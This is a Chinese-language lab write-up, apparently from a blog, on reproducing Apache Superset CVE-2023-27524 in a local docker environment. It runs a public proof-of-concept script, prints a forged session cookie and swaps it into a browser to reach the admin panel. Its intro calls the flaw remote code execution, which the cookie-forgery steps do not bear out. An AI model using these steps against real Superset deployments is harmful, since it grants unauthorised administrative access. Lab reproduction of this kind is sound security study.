ApacheSuperset CVE-2023-27524

前言:CVE-2023-27524 是一种远程代码执行漏洞,攻击者通过该漏洞可在受影响系统上执行任意代码,从而获得未授权访问权

CVE-2023-27524 GitHubhttps://github.com/horizon3ai/CVE-2023-27524

任务一 代理 | 拉取镜像

复制代码
vi /etc/proxychains4.conf
//最下面修改真机IP端口
复制代码
docker compose up -d
docker ps
//拉取成功后查看8088就是服务器端口

任务二 python 问题解决

复制代码
python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//发现缺少 'flask_unsign'
复制代码
python3 -m venv myenv
source myenv/bin/activate
//创建并激活一个虚拟环境

//安装 flask-unsign
proxychains4 pip install flask-unsign

任务三 生成cookie

复制代码
python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//下面这样就是安装成功了

【eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.aEAshA.TmTRYFed6TPxFmeOmLRrQAXX3vc】

任务四 替换cookie

复制代码
//随便下载一个cookie的小插件 我用的是cookieManage
复制代码
//替换进去保存,刷新一下就进管理界面了

任务五 实验结束

相关推荐
用户9623779544826 分钟前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star30 分钟前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954484 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行5 天前
网络安全总结
安全·web安全
red1giant_star5 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透5 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全
一名优秀的码农5 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
Libraeking5 天前
05 安全边界:MCP Server 的权限沙箱与敏感数据保护
安全
努力的lpp5 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入